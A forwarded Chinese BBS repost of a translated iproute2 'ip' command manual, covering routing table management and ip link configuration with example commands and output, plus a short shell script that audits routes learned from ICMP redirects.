发信人: CrazyKid (疯狂小子※爱学习/爱生活), 信区: Linux 标 题: [FWD] ip命令手册(二)发信站: BBS 水木清华站 (Sat Nov 2 16:06:30 2002), 站内信件http://www.linuxaid.com.cn/articles/1/3/130107498.shtmlip命令手册(二)摘要这一部分是关于使用ip命令管理系统路由的内容。(2002-10-31 23:27:51)--------------------------------------------------------------------------------By nixe0n7.路由表管理7.1.缩写 route、ro、r 7.2.对象 路由条目保存在内核的路由表中,它们包含寻找到其它网络节点的路径信息。路由表条目都包括一对网络地址/掩码长度以及可选的TOS值等信息。如果数据包目的地址位于属于路由条目的的范围,以及路由的TOS等于0或者等于数据包的TOS,它就匹配路由条目。如果一个数据包匹配多个路由条目,系统内核将按照以下规则决定选择哪个路由: 注:作者在文中把地址被子网掩码屏蔽后的部分/掩码长度这种表达方式叫做前缀(prefix)。例如:10/8表示网络10.0.0.0,子网掩码长度是8位;10.1/16表示网络10.1.0.0,子网掩码长度是16位; 范围最小的优先匹配,较大的放弃; 路由TOS等于数据包TOS的匹配,不等于的放弃; 如果经过上面两步的选择,还有数个路由,就选择优先值最高的路由; 如果还有数个路由可供选择,就重复进行第一步。 为了简化,我们使用{prefix,tos,preference}来标记每个路由。 7.3.路由属性 路由条目提供IP数据包投递所需的路由信息、数据(例如:输出设备、下一跳的路由器)和一些可选属性(例如:路径的最大传输单元MTU或者源地址等)。这些属性将在后面的章节详细介绍。 7.4.路由类型 路由的设置以及其它的可选属性都依赖于路由类型。最重要的路由类型是unicast路由,这种类型的路由表示到另外主机的真实路由。一般情况下,通常的路由表只有这种类型的路由条目。不过,还存在其它类型的路由,使用的语法也不相同。Linux-2.2理解以下几种类型的路由: unicast 这种类型的路由描述到目的地址的真实路径。 unreachable 这些目的地址是不可达的。如果发过去的数据包都被丢弃并且收到ICMP信息host unreachable,目的地址就会被标记为不可达。在这种情况下,本地发送者将返回EHOSTUNREACH错误。 blackhole 这些目的地址不可达,而且发过去的数据包都被丢弃。在这种情况下,本地发送者将返回EINVAL错误。 prohibit 这些路由是不可达的。发过去的数据包都被丢弃,而且产生ICMP信息communication administratively prohibited 。本地发送者会返回EACCESS错误。 local 目的地址被分配给本机。数据包通过回环被投递到本地。 broadcast 目的地址是广播地址,数据包作为链路广播发送。 throw 和策略规则(policy rule)一块使用的控制路由。如果选择了这种路由,就会认为没有发现路由,在这个表中的查询就会被终止。没有找到策略路由就相当于在路由表中没有找到路由,数据包会被丢弃,并产生ICMP信息net unreachable。本地发送者会返回ENETUNREACH错误。 nat 特定的NAT路由。目标地址属于哑地址(或者称为外部地址),在转发前需要进行地址转换。 anycast 目标是anycast地址,被分配给本机。这类地址和本地地址大同小异,不同的是这类地址不能用于任何数据包的源地址。 multicast 使用多播路由。在普通的路由表中,这种路由并不存在。 7.5.路由表 从Linux-2.2开始,内核把路由归纳到许多路由表中,这些表都进行了编号,编号数字的范围是1到255。另外,为了方便,还可以在/etc/iproute2/rt_tables中为路由表命名。默认情况下,所有的路由都会被插入到表main(编号254)中。在进行路由查询时,内核只使用路由表main。 实际上,还有另外一个路由表也一直存在,这个表是不可见的,而且极为重要。这就是表local。这个表保存本地和广播路由。内核会自动维护这个路由表,通常系统管理员没有必要对它进行修改,甚至不必看到。 在使用策略路由(policy routing)时,我们将使用多个路由。在这种情况下,表识别符有很多参数,因此需要使用{prefix,tos,preference}的形式唯一地识别每个路由。 7.6.ip 
route add -- 添加新路由ip route change -- 修改路由ip route replace -- 替换已有的路由缩写:add、a;change、chg;replace、repl 参数 to PREFIX或者to TYPE PREFIX(default) 路由的目标前缀(prefix)。如果TYPE被忽略,ip命令就会使用默认的类型unicast。其它的类型在上一节都有介绍。PREFIX是一个IP或者IPv6地址,也可以跟着一个斜杠和掩码长度。如果没有掩码长度,ip命令就假定是一个单一ip地址。另外,还有一个特殊的PREFIX--default(缺省路由),它等于IPv4的0/0,或者IPv6的::/0。 tos TOS 或者defield TOS 定义服务类型关键词。在进行路由匹配时,内核首先比较数据包的TOS和route的TOS,如果没有和数据包TOS相同的路由,还可以选择TOS等于0的路由。TOS或者是一个十六进制的数字,或者是一个由/etc/iproute2/rt_dsfield文件定义的识别符。 metric NUMBER或者preference NUMBER 定义路由的优先值,NUMBER时一个任意的32位数字。 table TABLEID 路由要加入的表。TABLEID或者是一个数字或者是/etc/iproute2/rt_tables文件定义的一个字符串。如果没有这个参数,ip命令就会把路由加入到表main中,本地(local)、广播(broadcast)和网络地址转换(nat)路由除外。在默认情况下,这些类型的路由都会被加入表local中。 dev NAME 输出设备的名字 via ADDRESS 指定下一跳路由器的地址。实际上,这个域的可靠性取决于路由类型。对于通常的unicast路由,它或者是真正的下一跳路由器地址,或者如果它是BSD兼容模式安装的直接路由,它可以是一个网络接口的本地地址。对于NAT路由,它是转换后的地址。 src ADDRESS 在向目的prefix发送数据包时选择的源地址。 realm REALMID 指定路由分配的realm。REALM可以是一个数字或者/etc/iproute2/rt_realms文件定义的一个字符串。有关realm更为详细的信息请看附录(Route realms and policy propagation, rtacct)。 mtu MTU或者mtu lock MTU 设置到达目的路径的最大传输单元(MTU)。如果没有使用修饰符lock,内核会通过路径最大传输单元发现(Path MTU Discovery)机制更新MTU;如果使用了修饰符lock,内核就不会测试路径的最大传输单元。在这种情况下,发出的所有IPv4数据包DF域都会被设置为0(允许分片),对于IPv6数据包也允许分片。 window NUMBER 设置到目的地址TCP连接的最大窗口值,以字节为单位。使用这个参数可以限制对端发送数据的速率。 rtt NUMBER 估算初始往返时间(Round Trip Time) rttvar NUMBER 估算初始往返时间偏差(RTT variance) ssthresh NUMBER 估算慢启动阀值(slow start threshould) cwnd NUMBER 把拥挤窗口(congestion window)值锁定为NUMBER。如果没有lock标记,这个值会被忽略。 advmss NUMBER 设置在建立TCP连接时,向目的地址声明的最大报文段大小(Maximal Segment Size,MSS)。如果没有设置,Linux内核会使用计算第一跳的最大传输单元得到的数值。 nexthop NEXTHOP 设置多路径路由的下一跳地址。NEXTHOP比较复杂,它的语法和以下高层参数类似:via ADDRESS--表示下一跳路由器;dev NAME--表示输出设备;weight NUMBER--在多路由路径中,这个元素的权重。表示相对带宽或者服务质量。 scope SCOPE_VAL 路由前缀(prefix)覆盖的范围。SCOPE_VAL可以是一个数字,也可以是/etc/iproute2/rt_scope文件定义的一个字符串。如果没有这个参数,ip命令就会根据具体情况猜测:对于经过网关的unicast路由,就设置为global;对于直连的unicast路由和广播路由,就设置为link;对于本地路由,就设置为host。 protocol RTPROTO 
The routing protocol identifier of this route. RTPROTO may be a number or a string defined in /etc/iproute2/rt_protos. If the parameter is not given, ip assumes the default value boot (that is, ip assumes that whoever added the route does not know what they are doing). Some protocol values have a fixed interpretation:
  redirect -- the route was installed by an ICMP redirect;
  kernel -- the route was installed by the kernel during autoconfiguration;
  boot -- the route was installed during the boot process. When a routing daemon starts, it will purge all of these routes;
  static -- the route was installed by the administrator to override dynamic routing. A routing daemon respects such routes and will probably even advertise them to its peers;
  ra -- the route was installed by the Router Discovery Protocol.
The remaining values are not reserved, and the administrator is free to assign (or not assign) them to protocol tags. At the very least, routing daemons should take care to set some unique protocol values; the values are allocated in rtnetlink.h or in the rt_protos database.

  onlink  Pretend that the nexthop is directly attached to this link, even if it does not match any interface prefix.
  equalize  Allow packet-by-packet randomization on multipath routes. Without this modifier the kernel freezes the nexthop address.

Examples
Add a route to network 10.0.0/24 via gateway 193.233.7.65:
    ip route add 10.0.0/24 via 193.233.7.65
Change the direct route to 10.0.0/24 so that it goes through device dummy:
    ip route chg 10.0.0/24 dev dummy
Add a default multipath route that shares load between ppp0 and ppp1 (note: the scope value is not required; it only tells the kernel that this route goes via gateways rather than being directly connected. Actually, if you know the addresses of the remote endpoints, it is better to use the via parameter):
    ip route add default scope global nexthop dev ppp0 nexthop dev ppp1
Add a NAT route. Before forwarding packets from 192.203.80.144, translate that address to 193.233.7.83 (the reverse translation is described later, in the chapter on routing policy):
    ip route add nat 192.203.80.142 via 193.233.7.83

7.7. ip route delete -- delete routes
Abbreviations: delete, del, d
Parameters
ip route del takes the same parameters as ip route add, but the semantics differ slightly. The command selects the route to delete by the key words (to, tos, preference and table). If optional attributes are given, ip checks that they agree with the route being deleted; if no key is given or the attributes do not match, ip route del fails.
Example
Delete the multipath route added in the previous section:
    ip route del default scope global nexthop dev ppp0 nexthop dev ppp1

7.8. ip route show -- list routes
Abbreviations: show, list, sh, ls, l
Description
With this command you can look at the contents of the routing tables or select routes matching some criteria.
Parameters
  to SELECTOR (default)  Select only routes to the given destination. SELECTOR consists of an optional modifier (root, match, exact) and a prefix. root PREFIX selects routes with prefixes not shorter than PREFIX, e.g. root 0/0 selects the whole routing table; match PREFIX selects routes with prefixes not longer than PREFIX, e.g. match 10.1/16 selects the routes to 10.1/16, 10./8 and 0/0; exact PREFIX (or just PREFIX) selects routes with exactly this prefix. Without this option (ip route ls), ip assumes ip route ls to root 0/0 and lists all routes on the system.
  tos TOS or dsfield TOS  Select only routes with the given TOS.
  table TABLEID  Show the routes from table TABLEID. The default is table main. TABLEID is either the ID of a real table, a string defined in /etc/iproute2/rt_tables, or one of the special values: all -- list all tables; cache -- dump the routing cache.
  cloned or cached  List cloned routes, i.e. routes dynamically forked from other routes because some route attribute (e.g. MTU) changed. Actually, this is equivalent to table cache.
  from SELECTOR  Same syntax as to, but selecting by source address rather than destination. Note: this option applies only to cloned routes.
  protocol RTPROTO  List only routes of protocol RTPROTO.
  scope SCOPE_VAL  List only routes with scope SCOPE_VAL.
  type TYPE  List only routes of type TYPE.
  dev NAME  List only routes going via device NAME.
  via PREFIX  List only routes whose nexthop is in PREFIX.
  src PREFIX  List only routes whose preferred source address is in PREFIX.
  realm REALMID or realm FROMREALM/TOREALM  List only routes with realm REALMID.
Examples
Count the routes of protocol gated/bgp:
    kuznet@amber:~ $ ip route ls proto gated/bgp |wc
       1413    9891   79010
    kuznet@amber:~ $
Count the entries in the routing cache; because cached routes may take more than one line, the -o option is needed:
    kuznet@amber:~ $ ip -o route ls cloned |wc
        159    2543   18707
    kuznet@amber:~ $
Output format
Normally, each route record takes one line of output. Some records, however, such as cloned routes or routes carrying additional information, may span several lines. With the -o option, the line feeds inside a record are replaced by the \ character. For example:
    kuznet@amber:~ $ ip ro ls 193.233.7/24
    193.233.7.0/24 dev eth0  proto gated/conn  scope link  src 193.233.7.65 realms inr.ac
    kuznet@amber:~ $
Cloned entries are listed in a different form, e.g.:
    kuznet@amber:~ $ ip ro ls 193.233.7.82 tab cache
    193.233.7.82 from 193.233.7.82 dev eth0  src 193.233.7.65  realms inr.ac/inr.ac
        cache <src-direct,redirect>  mtu 1500 rtt 300 iif eth0
    193.233.7.82 dev eth0  src 193.233.7.65  realms inr.ac
        cache  mtu 1500 rtt 300
    kuznet@amber:~ $
The second line of each record starts with the keyword cache and shows the cache flags and other attributes of the route. The first field of the line is cache <cache flags>; the cache flags are:
  local  The packet is delivered locally. It applies to loopback unicast routes, and also to broadcast and multicast routes if this host is a member of the corresponding group.
  reject  The path is bad. Any attempt to use this route results in an error.
  mc  The destination is a multicast address.
  brd  The destination is a broadcast address.
  src-direct  The source address is on a directly connected interface.
  redirected  The route was created by an ICMP redirect.
  redirect  Packets going via this route will trigger an ICMP redirect.
  fastroute  The route is eligible for fastroute.
  equalize  Make packet-by-packet randomization along this route.
  dst-nat  The destination address requires translation.
  src-nat  The source address requires translation.
  masq  The source address requires masquerading.
  notify  Changing or deleting this route will trigger an RTNETLINK notification.
Then come the route attributes; the following are supported:
  error  For reject routes, the error code returned to local senders. These codes are also translated into ICMP error codes sent to remote senders.
  expires  The entry expires after this time.
  iif  Packets for this route are expected to arrive on this interface.
Statistics option
With the -statistics option, ip prints more detailed information:
  users  The number of users of this route.
  age  The time since this route was last used.
  used  The number of lookups of this route since it was created.

7.9. ip route flush -- flush routing tables
Abbreviations: flush, f
Description
With this command you can conveniently delete routes selected by some criteria.
Parameters
The parameters are the same as for ip route show, except that the selected routes are not shown but flushed. The only other difference is the default action: ip route show dumps all of table main, whereas ip route flush only prints a help page and does nothing to the routing table. The reason for the difference hardly needs an explanation, does it?
Statistics option
With the -statistics option, the command prints some verbose information: the number of deleted routes and the number of rounds made to flush the table. If the option is given twice, ip also dumps the details of the deleted routes.
Examples
The first example flushes all gateway routes from table main (e.g. after a routing daemon has crashed):
    netadm@amber:~ # ip -4 ro flush scope global type unicast
The second example flushes all cloned IPv6 routes:
    netadm@amber:~ # ip -6 -s -s ro flush cache
    3ffe:2400::220:afff:fef4:c5d1 via 3ffe:2400::220:afff:fef4:c5d1 dev eth0  metric 0
        cache  used 2 age 12sec mtu 1500 rtt 300
    3ffe:2400::280:adff:feb7:8034 via 3ffe:2400::280:adff:feb7:8034 dev eth0  metric 0
        cache  used 2 age 15sec mtu 1500 rtt 300
    3ffe:2400::280:c8ff:fe59:5bcc via 3ffe:2400::280:c8ff:fe59:5bcc dev eth0  metric 0
        cache  users 1 used 1 age 23sec mtu 1500 rtt 300
    3ffe:2400:0:1:2a0:ccff:fe66:1878 via 3ffe:2400:0:1:2a0:ccff:fe66:1878 dev eth1  metric 0
        cache  used 2 age 20sec mtu 1500 rtt 300
    3ffe:2400:0:1:a00:20ff:fe71:fb30 via 3ffe:2400:0:1:a00:20ff:fe71:fb30 dev eth1  metric 0
        cache  used 2 age 33sec mtu 1500 rtt 300
    ff02::1 via ff02::1 dev eth1  metric 0
        cache  users 1 used 1 age 45sec mtu 1500 rtt 300
    *** Round 1, deleting 6 entries ***
    *** Flush is complete after 1 round ***
    netadm@amber:~ # ip -6 -s -s ro flush cache
    Nothing to flush.
    netadm@amber:~ #
The third example flushes all BGP routes after the gated daemon has died:
    netadm@amber:~ # ip ro ls proto gated/bgp |wc
       1408    9856   78730
    netadm@amber:~ # ip -s ro f proto gated/bgp
    *** Round 1, deleting 1408 entries ***
    *** Flush is complete after 1 round ***
    netadm@amber:~ # ip ro f proto gated/bgp
    Nothing to flush.
    netadm@amber:~ # ip ro ls proto gated/bgp
    netadm@amber:~ #

7.10. ip route get -- get a single route
Abbreviations: get, g
Description
This command gets a single route to a destination and prints its exact contents.
Parameters
  to ADDRESS (default)  The destination address.
  from ADDRESS  The source address.
  tos TOS or dsfield TOS  The type of service.
  iif NAME  The device the packet arrives on.
  oif NAME  The device the packet leaves through.
  connected  ip route get requires at least the to ADDRESS parameter. With connected, if no source address (from ADDRESS) is given, ip looks the route up again using the source address obtained from the first lookup, and prints the route from that source address to the destination. With policy routing the result may differ.
Note that ip route get and ip route show do different things. ip route show only displays existing routes, whereas ip route get derives new routes where necessary.
Output format
The output format is the same as for ip route ls.
Examples
Find the route to 193.233.7.82:
    kuznet@amber:~ $ ip route get 193.233.7.82
    193.233.7.82 dev eth0  src 193.233.7.65  realms inr.ac
        cache  mtu 1500 rtt 300
    kuznet@amber:~ $
Find the route to 193.233.7.82 for packets from 193.233.7.82 arriving on eth0 (this command produces a rather interesting route: a loopback route to 193.233.7.82):
    kuznet@amber:~ $ ip r g 193.233.7.82 from 193.233.7.82 iif eth0
    193.233.7.82 from 193.233.7.82 dev eth0  src 193.233.7.65  realms inr.ac/inr.ac
        cache <src-direct,redirect>  mtu 1500 rtt 300 iif eth0
    kuznet@amber:~ $
Get a multicast route for packets from host 193.233.7.82, arriving on eth0, to the multicast group address 224.2.127.254 (this requires the multicast routing daemon pimd to be running). This route differs from the ones above: it has a regular part and a multicast part. The regular part is used to deliver the packet to local IP listeners; here the local address is not a member of the multicast group, so the route has no local flag and is only used for forwarding. Its output device is the loopback device. The multicast part contains the additional output interfaces.
    kuznet@amber:~ $ ip r g 224.2.127.254 from 193.233.7.82 iif eth0
    multicast 224.2.127.254 from 193.233.7.82 dev lo  src 193.233.7.65  realms inr.ac/cosmos
        cache <mc> iif eth0 Oifs: eth1 pimreg
    kuznet@amber:~ $
Now a more complicated example. First we add an invalid gateway route for a destination that is actually directly connected:
    netadm@alisa:~ # ip route add 193.233.7.98 via 193.233.7.254
    netadm@alisa:~ # ip route get 193.233.7.98
    193.233.7.98 via 193.233.7.254 dev eth0  src 193.233.7.90
        cache  mtu 1500 rtt 3072
    netadm@alisa:~ #
Then we ping 193.233.7.98:
    netadm@alisa:~ # ping -n 193.233.7.98
    PING 193.233.7.98 (193.233.7.98) from 193.233.7.90 : 56 data bytes
    From 193.233.7.254: Redirect Host(New nexthop: 193.233.7.98)
    64 bytes from 193.233.7.98: icmp_seq=0 ttl=255 time=3.5 ms
    From 193.233.7.254: Redirect Host(New nexthop: 193.233.7.98)
    64 bytes from 193.233.7.98: icmp_seq=1 ttl=255 time=2.2 ms
    64 bytes from 193.233.7.98: icmp_seq=2 ttl=255 time=0.4 ms
    64 bytes from 193.233.7.98: icmp_seq=3 ttl=255 time=0.4 ms
    64 bytes from 193.233.7.98: icmp_seq=4 ttl=255 time=0.4 ms
    ^C
    --- 193.233.7.98 ping statistics ---
    5 packets transmitted, 5 packets received, 0% packet loss
    round-trip min/avg/max = 0.4/1.3/3.5 ms
    netadm@alisa:~ #
The output shows that router 193.233.7.254 knew a better route and sent back an ICMP redirect. Now look at the routing table again:
    netadm@alisa:~ # ip route get 193.233.7.98
    193.233.7.98 dev eth0  src 193.233.7.90
        cache <redirected>  mtu 1500 rtt 3072
    netadm@alisa:~ #
[Editor: nixe0n]
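As an added illustration (not part of the forwarded manual) of the cache flags described in 7.8 and the ICMP redirect walk-through in 7.10, the POSIX shell functions below pick out the routes a kernel has learned from redirects: cached routes carrying the redirected flag and table entries with proto redirect. The ip output they read is a constructed single-line sample; the 192.168.5.0/24 entry is made up for the example.

```shell
#!/bin/sh
# Constructed sample of cached routes in single-line form (not a real capture);
# the flag set between angle brackets after "cache" is the one described in 7.8.
SAMPLE_CACHE='193.233.7.98 dev eth0 src 193.233.7.90 cache <redirected> mtu 1500 rtt 3072
193.233.7.82 from 193.233.7.82 dev eth0 src 193.233.7.65 realms inr.ac/inr.ac cache <src-direct,redirect> mtu 1500 rtt 300 iif eth0
193.233.7.82 dev eth0 src 193.233.7.65 realms inr.ac cache mtu 1500 rtt 300'

# Constructed sample of `ip route ls` (table main) output; the proto field is
# the RTPROTO tag, and the kernel marks redirect-installed routes proto redirect.
SAMPLE_MAIN='10.0.0.0/24 via 193.233.7.65 dev eth0 proto static
192.168.5.0/24 via 193.233.7.254 dev eth0 proto redirect
193.233.7.0/24 dev eth0 proto kernel scope link src 193.233.7.90'

# Print the destination of every cached route whose cache flags contain $1
# (e.g. redirected). Cache lines are read from stdin.
cached_with_flag() {
    awk -v want="$1" '
        # isolate the text inside "cache <...>" and test each comma-separated flag
        match($0, /cache <[^>]*>/) {
            flags = substr($0, RSTART + 7, RLENGTH - 8)
            n = split(flags, f, ",")
            for (i = 1; i <= n; i++)
                if (f[i] == want) { print $1; break }
        }'
}

# Print the destination of every route whose proto field equals $1
# (e.g. redirect). Route lines are read from stdin.
routes_by_proto() {
    awk -v want="$1" '{
        for (i = 1; i < NF; i++)
            if ($i == "proto" && $(i + 1) == want) { print $1; break }
    }'
}

# One line per route that exists only because a router sent an ICMP redirect,
# prefixed with the table it lives in.
redirect_audit() {
    printf '%s\n' "$SAMPLE_CACHE" | cached_with_flag redirected | sed 's/^/cache redirected: /'
    printf '%s\n' "$SAMPLE_MAIN"  | routes_by_proto redirect    | sed 's/^/main proto redirect: /'
}

redirect_audit
```

On a host that is expected to use only its configured gateways, a non-empty report is worth a look; whether the kernel installs such routes at all is governed by the accept_redirects sysctls under net.ipv4.conf.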
Source: BBS 水木清华站 smth.edu.cn
Posted by windtear at 1:38 AM
2. ip usage 1 - iproute2 - the most powerful tool - [FWD] ip command manual (part 1)
From: CrazyKid (疯狂小子※爱学习/爱生活), Board: Linux
Subject: [FWD] ip command manual (part 1)
Posted at: BBS 水木清华站 (Tue Oct 15 23:21:06 2002), local mail

http://linuxaid.com.cn/articles/3/2/325173459.shtml

ip command manual (part 1)

Abstract: ip is a powerful network configuration tool in the iproute2 package; it can replace traditional network administration tools such as ifconfig and route. This manual describes the ip command and its options chapter by chapter. The original text is at http://defiant.coinet.com/iproute2/ip-cref/ (2002-10-15 18:40:46)
------------------------------------------------------------------------
By nixe0n
Author: Alexey N. Kuznetsov
Compiled and translated by: nixe0n

1. About this document
2. ip command syntax
3. ip error messages
4. ip link -- network device configuration
4.1. ip link set -- change device attributes
4.2. ip link show -- display device attributes
5. ip address -- protocol address management
5.1. ip address add -- add a new protocol address
5.2. ip address delete -- delete a protocol address
5.3. ip address show -- display protocol addresses
5.4. ip address flush -- flush protocol addresses
6. ip neighbour -- neighbour/ARP table management
6.1. ip neighbour add -- add a new neighbour entry; ip neighbour change -- change an existing entry; ip neighbour replace -- replace an existing entry
6.2. ip neighbour delete -- delete a neighbour entry
6.3. ip neighbour show -- display neighbour information
6.4. ip neighbour flush -- flush neighbour entries

1. About this document
ip is a powerful network configuration tool from the iproute2 package; this document describes the ip command and its options chapter by chapter. To aid understanding, the author gives many examples. But, as the author says, this is not a tutorial but a reference manual.

2. ip command syntax
The ip command is used as follows:
    ip [OPTIONS] OBJECT [COMMAND [ARGUMENTS]]
OPTIONS modify ip's behaviour or change its output. All options start with the - character and come in a long and a short form. ip currently supports the following options:
  -V, -Version  Print the version of ip and exit.
  -s, -stats, -statistics  Output more detailed information. If the option appears two or more times, the output is more verbose still.
  -f, -family  Followed by a protocol family: inet, inet6 or link, forcing that family to be used. If there is not enough information to tell ip which family to use, ip falls back to the default, inet or any. link is special: it means no network protocol is involved.
  -4  Shortcut for -family inet.
  -6  Shortcut for -family inet6.
  -0  Shortcut for -family link.
  -o, -oneline  Output each record on a single line, replacing line feeds with the \ character. This is useful when you want to process ip output with tools such as wc or grep.
  -r, -resolve  Query the name resolution system and print host names instead of host IP addresses.
OBJECT is the object you want to manage or get information about. ip currently knows the following objects:
  link  network device
  address  protocol (IP or IPv6) address on a device
  neighbour  ARP or NDISC cache entry
  route  routing table entry
  rule  rule in the routing policy database
  maddress  multicast address
  mroute  multicast routing cache entry
  tunnel  tunnel over IP
All object names may be abbreviated; address, for example, may be written addr or even a.
COMMAND specifies the action to perform on the object, and depends on the object type. Generally, ip supports adding (add), deleting (delete) and showing (show or list) objects. Some objects do not support all of these actions or have additional commands. For all objects you can use the help command, which lists the commands the object supports and their argument syntax. If no command is given, ip uses a default command, normally list, or help if the object cannot be listed.
ARGUMENTS are the command's arguments and depend on the object and command. ip supports two kinds of arguments: flags and parameters. A flag consists of a single keyword; a parameter consists of a keyword followed by a value. For convenience, each command has one default parameter that may be omitted. For example, dev is the default parameter of ip link, so ip link ls eth0 is equivalent to ip link ls dev eth0. Later chapters describe each command in detail and mark the default parameter with default.
Almost all keywords may be abbreviated to their first few letters. Abbreviations are convenient in interactive use, but we do not recommend them in scripts. All "official" abbreviations are listed in the text.

3. ip error messages
ip may fail for the following reasons:
  - A syntax error on the command line: an unknown keyword or an incorrectly formatted IP address. In this case ip prints an error message containing the reason and exits; sometimes it also prints a help page.
  - The arguments did not pass a consistency check.
  - ip could not compile a kernel request from the arguments because the user did not supply enough information.
  - The kernel returned an error for a system call. ip prints the error with perror(3), so the message contains a comment and the system call number.
  - The kernel returned an error for an RTNETLINK request. Such messages start with "RTNETLINK answers".
All ip operations are atomic: if ip fails, it changes nothing in the system. The exception is the ip link command, which may change some device parameters.
It is impossible to list all error messages, particularly syntax errors, but their meaning is always clear. Some frequent ones:
If the kernel does not support netlink (netlink carries messages between kernel modules and user space):
    Cannot open netlink socket: Invalid value
If the kernel does not support RTNETLINK:
    Cannot talk to rtnetlink: Connect refused
    Cannot send dump request: Connect refused
If the kernel was compiled without the CONFIG_IP_MULTIPLE_TABLES option, using ip rule produces messages like:
    kuznet@kaise $ ip rule list
    RTNETLINK error: Invalid argument
    dump terminated

4. ip link -- network device configuration
Object: link is a network device, and the corresponding commands display and change the state of devices.
Commands: set and show (or list)

4.1. ip link set -- change device attributes
Abbreviations: set, s
Parameters:
  dev NAME (default)  The network device to operate on.
  up / down  Bring the device up or down, e.g. ip link set dev eth0 up
  arp on / arp off  Change the NOARP flag of the device. This is not allowed while the device is UP; however, neither the kernel nor ip checks for it, and changing the flag on a running device has unpredictable consequences.
  multicast on / multicast off  Change the MULTICAST flag of the device.
  dynamic on / dynamic off  Change the DYNAMIC flag of the device.
  name NAME  Rename the device to NAME (e.g. eth0). Not advisable if the device is running or already has addresses configured.
  txqueuelen NUMBER or txqlen NUMBER  Change the transmit queue length of the device, e.g. ip link set dev eth0 txqueuelen 100
  mtu NUMBER  Change the MTU (maximum transfer unit) of the device, e.g. ip link set dev eth0 mtu 1500
  address LLADDRESS  Change the MAC address of the device, e.g. ip link set dev eth0 address 00:01:4f:00:15:f1
  broadcast LLADDRESS or brd LLADDRESS  Change the link-layer broadcast address. Note: for most network devices (e.g. Ethernet), changing the link-layer broadcast address breaks networking; do not use this unless you understand it thoroughly.
  peer LLADDRESS  On a point-to-point link, change the link-layer address of the peer.
Note: ip cannot change the PROMISC and ALLMULTI flags. These flags are obsolete and should not be changed anyway.
Note: if several parameters are changed at once and any of the changes fails, ip aborts immediately. This may leave the system in an unpredictable state. To avoid it, do not change several parameters with one ip link set command, such as ip link set dev eth0 mtu 1500 txqueuelen 100.

4.2. ip link show -- display device attributes
Abbreviations: show, list, lst, sh, ls, l
Parameters
  dev NAME (default)  NAME is the network device name, e.g. eth0. If omitted, the attributes of all devices are listed.
  up  Show only interfaces that are running.
Output format
    kuznet@alisa:~ $ ip link ls eth0
    3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100
        link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff
    kuznet@alisa:~ $ ip link ls sit0
    5: sit0@NONE: <NOARP,UP> mtu 1480 qdisc noqueue
        link/sit 0.0.0.0 brd 0.0.0.0
    kuznet@alisa:~ $ ip link ls dummy
    2: dummy: <BROADCAST,NOARP> mtu 1500 qdisc noop
        link/ether 00:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
    kuznet@alisa:~ $
The number before each colon is the interface index, which identifies the interface. It is followed by the interface name (eth0, dummy, ...), which also corresponds one-to-one with the interface. In some cases, however, e.g. when a driver module is unloaded, the name disappears from the list and a newly created interface may reuse the same name. The administrator can change an interface name with ip link set name.
The interface name may have another name, or NONE, appended after an @ sign. This means the device is bound to another device: packets sent to this device are encapsulated by it and sent out through the master device. If the name is NONE, the master device is unknown.
Next comes the mtu (Maximal Transfer Unit), which determines how much data a single packet on this interface can carry.
qdisc (queuing discipline) shows the queuing algorithm the interface uses. noqueue means packets are not queued; noop means the interface is in black-hole mode, i.e. all packets sent to it are dropped. qlen is the default length of the interface's transmit queue.
A network interface may have the following flags:
  UP  The device is running and can receive and send packets.
  LOOPBACK  The interface cannot communicate with other hosts; all packets sent to it are returned, and the interface only receives packets bounced back this way.
  BROADCAST  The device can send packets to all hosts on the link. An Ethernet link is the typical example.
  POINTTOPOINT  The two nodes are directly connected. All packets a node sends go to the peer, and all packets it receives come from the peer.
  MULTICAST  The device has multicast capability, i.e. it can send packets to some subset of neighbouring nodes. Broadcast is in fact a special case of multicast in which the multicast group consists of all nodes on the link. By definition, POINTTOPOINT and BROADCAST links are multicast.
  * If an interface has none of the LOOPBACK, BROADCAST or POINTTOPOINT flags, it is assumed to be NBMA (Non-Broadcast Multi-Access). This is the most general type.
  PROMISC  The device is in promiscuous mode and receives all data on the link regardless of destination address. This mode is normally used for bridging and network monitoring.
  ALLMULTI  The device receives all multicast packets on the link; multicast routers use this mode.
  NOARP  Unlike the other flags, the meaning of this one depends on the network protocol. It generally means the device needs no address resolution: the software or hardware knows how to deliver packets to their destination without help from the protocol stack.
  DYNAMIC  The interface is created and destroyed dynamically.
  SLAVE  The interface is bound to another interface.
  * Other flags exist, but they are either obsolete (e.g. NOTRAILERS), not implemented (e.g. DEBUG), or specific to certain devices (e.g. MASTER, AUTOMEDIA, PORTSEL), so they are not discussed here.
  * For the PROMISC and ALLMULTI flags, ifconfig and ip show different values: ip link ls shows the true device state, whereas ifconfig shows the virtual device state that it set itself.
The second line of the output contains information about the link-layer (MAC) address. Its first word (ether, sit) defines the hardware type of the interface, which in turn determines the format and semantics of the MAC addresses. The default format is the hardware MAC address and the broadcast address (or, for point-to-point links, the peer address), written as colon-separated hexadecimal numbers. Some link types have their own address format, e.g. IP tunnels use dotted-decimal IP addresses.
NBMA (Non-Broadcast Multi-Access) links have no well-defined broadcast or peer address. This field may still carry useful information, however, e.g. the address of an ARP server that the link relies on for broadcast.
This command does not show multicast addresses; use ip maddr ls for that. See section 9, ip maddr ls, for details.
Statistics
With the -statistics option, ip prints the interface statistics, e.g.:
    kuznet@alisa:~ $ ip -s link ls eth0
    3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100
        link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff
        RX: bytes  packets  errors  dropped overrun mcast
        2449949362 2786187  0       0       0       0
        TX: bytes  packets  errors  dropped carrier collsns
        178558497  1783946  332     0       332     35172
    kuznet@alisa:~ $
RX: and TX: introduce the receive and transmit statistics. The fields are:
  bytes  The number of bytes received or sent by the interface. If the count exceeds the largest value the data type can hold, it wraps around. To monitor this counter continuously you therefore need a user-space monitor that periodically saves the value.
  packets  The number of packets received or sent by the interface.
  errors  The number of errors.
  dropped  The number of packets dropped because of a lack of system resources.
  overrun  The number of received packets dropped because the interface overran. If an interface overruns, the kernel or your machine is too slow to handle the incoming data.
  mcast  The number of multicast packets received; only a few devices support this.
  carrier  The number of link media failures, e.g. a badly connected cable.
  collsns  The number of collision events on Ethernet-like media.
  compressed  The total number of compressed packets. This applies only to interfaces using VJ header compression.
If the -s option is given two or more times, ip prints more detailed error statistics:
